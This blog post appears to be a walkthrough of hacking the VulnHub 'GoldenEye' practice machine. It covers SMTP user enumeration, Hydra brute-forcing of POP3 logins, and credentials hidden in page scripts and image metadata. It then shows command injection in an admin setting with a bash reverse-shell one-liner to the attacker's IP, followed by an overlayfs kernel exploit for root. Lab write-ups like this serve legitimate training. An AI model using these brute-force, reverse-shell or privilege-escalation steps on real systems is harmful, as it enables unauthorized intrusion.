Vulnhub is such a great resource for vulnerable virtual machines. Sometimes it can be hit or miss with the realism. At times it’s even laughable that the creator thought you’d find a certain flag.

I’m so happy to say, that the person that created the GoldenEye box (@_creosote)did not disappoint. If you’re a fan of the original 90’s James Bond flick GoldenEye, then this machine is going to be a nostalgia bomb as well as a fun challenge.

Defining the Attack Surface

nmap 192.168.56.101 -sC -sV -p- -oN full_nmap_scan

Starting out with our full port scan -p-, script scan -sC, and version -sV. This reveals a few services running.

25: SMPTD

80: HTTPD

55006 POP3

55007 POP3

It looks like the SMTP server has some commands that it’ll accept. We might use that to brute force some usernames. I like to find the low hanging fruit first though so I start with the webserver

VulnHub – GoldenEye Boot2Root

Okay sweet initial landing page. Let’s follow the navigation instructions

Looks like we found a login. No creds yet though.

A good rule of thumb is to always look at the source of these pages. You never know what’s hiding in them.

Case in point, if you look at terminal.js which is linked in the homepage, you find some custom JS that was written to drive that sweet landing page

If you read the comments, it says

Boris, make sure you update your default password. My sources say MI6 maybe planning to infiltrate. Be on the lookout for any suspicious network traffic... I encoded you p@ssword below ...

When I run use Burp Decoder to decode that password we get the password InvincibleHack3r

From this we can probably safely assume the username is boris

So I go back to the login page and try out the creds boris:InvinceibleHack3r

Interesting, it looks like they’re pointing us at the Pop3 servers next

Finding Credentials and Users

Something fun I think might work on this server, is brute forcing the users. I’m not sure if this was cheating or not, but I used a tool called cewl to generate a massive wordlist. It’s great for brute forcing things that you believe are contextual. Since this box is all about the movie GoldenEye I decided to run cewl over the GoldenEye script to create a wordlist that’s contextual to the movie lol

The way we’re going to brute force the users is by abusing the SMTP server that’s running. By inspecting our NMAP output we can see that this server allows you to run the VRFY command. This command can be used to brute force usernames out of the system.

You can also do this attack by hand but it takes a little longer. We’ll see an example of this later on but for now we’re going to use the tool smtp-user-enum and give it our wordlist as well as our target

Sure enough we end up finding two users BORIS and NATALYA. We know Boris is valid for user login on the webpage, but now it appears it’s also a unix user.

You can use netcat to log into POP3 servers.

First I tried logging into the POP3 server with the user credentials we know, boris:InvincibleHack3r but they don’t seem to work. So it looks like the user credentials must be different. Thankfully we can use hydra to try and brute force the pop3 server

Using Hydra we were able to not only brute force the credentials boris:secret1! but also natalya:bird

Let’s try and log into the POP3 server again

Sure enough we get in!

I had to look up some documentation to understand the commands I needed to use here to retrieve emails but essentially here they are

USER <username> <~ Sets username

PASS <password> <~ Sets password

STAT <~ Tells you how many messages are available

LIST <~ Tells you the message id and I believe the length

RERT <ID> <~ Retrieves the message and displays it in the console

Here’s the other two emails I retrieved

Okay not a ton that’s useful there other than some great movie references

Let’s look at Natalya’s emails

First email doesn’t have much in it helpful but it does help us understand that she has GNO privileges for some system when students are assigned

Ahhhh here we go, some new creds and a link. It looks like there’s a hostname we need to add to our /etc/hosts file

After we save that file, we can navigate to that url severnaya-station.com

Let’s try logging in with Xenia’s credentials

We’re in!

After navigating through the site a little, I came across this file upload and got stuck here _FOR A WHILE_

Pretty sure this is not the spot for access lol

Little more digging and I found this email from Dr Doak

My email username is doak

Well that can’t get much more clear lol
Just to be thorough though, let’s try and use the same SMTP VRFY function

It does appear that doak is a user on the system. Let’s see if we can brute force his credentials too with Hydra like we did Natalya and Boris

SWEET! We got another set of creds doak:goat The GOAT rightfully so.

(Fun fact: Research who Doak is in the movie as well as who he is in real life)

Finding Admin Credentials

Alright, now we can log back into the mail server and see if Doak has anything juicy in his inbox

Okay, it looks like Dr Doak is speaking directly to us now and giving us his credentials to get into his account on the training site. If he’s the admin, we may be able to do more than just read posts.

We’re in! And we have a flag 🙂 Though it doesn’t appear Doak is an admin 🙁

Ohhh interesting, so we’re one step away from admin creds I guess.

Let’s check out that image

So I was hoping for a little more of a challenge here. The first thing I did with this image was try to run binwalk over it. I guess I was expecting some nested files. That didn’t turn anything up though. Next I ran strings over it

Looks like there’s some message in the exif data, so we can also run the exif tool over the image to retrieve that

It appears in the image description there’s a base64 encoded string. When we decode this string in burp decoder we get xWinter1995x!

Now that we have what I believe is the admin password for the training site, let’s try logging out of the site, and logging back in with admin:xWinter1995x!

Getting a Shell

I’ll admit that it took me a little bit to get this shell to work. I found the vulnerability immediately after logging in but for some reason it didn’t work for me.

As you make your way through the admin settings this input pops up under System Paths and it’s extraordinarily tempting looking. It’s clearly running some bash command. Sooooo, why not put our own bash command in? 🙂

Pulling from my favorite FAVORITE resource Reverse Shell Cheat Sheet by PenttestMonkey

I enter into that highlighted field the command

/bin/bash -i >& /dev/tcp/192.168.158.1/443 0>&1

Then on my attacking machine I run nc -lvp 443 which opens a listener up on port 443

This is where I got hung up. The way I believe this was supposed to work was put in your command, and then go to make a post. When you make a post run the spell check on your post and it should run this command here. What actually happened was nothing for me haha

I ended up getting it to work by going into the settings and toggling the spell checker service. Once again I’m not sure if this was an intentional step or not.

Once you do this, you go back to the blog post and once again attempt to run the spell checker. If you do this, your shell code will execute

Getting a Root Shell

I waste no time when I’m trying to elevate privileges. I pull down the script linenum.sh which you can find and more over on my favorite resources page

This had a ton of great info but ultimately it didn’t lead me to the root priv esc

To find that, I had to run the Linux Privilege Escalation Auditing Tool which you can find here linux-exploit-suggester.sh

Once you run this tool you’ll see that the machine is vulnerable to something called an overlayfs attack. This exploit can be found already installed on your attacking machine if you have exploitdb installed

You just need to run searchsploit overlaysfs

To which you will find a few candidates

Now, if you do what I did, you’ll get this c file over to the target machine, and attempt to compile it with gcc…. then you’ll realize there is no gcc

After some digging I came across something installed though called cc which is the c compiler on the machine

So, naturally I compiled it and attempted to run it…. Then it blew up and complained about gcc again.

You’ll need to open this file up on your attacking machine and modify some of the code

As you can see here, inside the code, it’s attempting to compile something with gcc. Which, of course now we know doesn’t exist on the machine. Just give it `cc` instead and you’ll be good to go.

Send that sucker back to your target machine again, recompile it and run it

AND WE ARE ROOT!

Summary

I can’t overstate how much fun this machine was considering how big of a part GoldenEye played in my childhood. Every inch of this machine was crawling with nostalgic references. I loved every bit of it. Also, there wasn’t anything too crazy on here. For the most part the exploits were poor configurations and bad password management which we know happens in the real world.

In closing, if you’re a Goldeneye fanboi or fangirl, go check this box out. It’s a great time

Leave a Reply

two × 2 =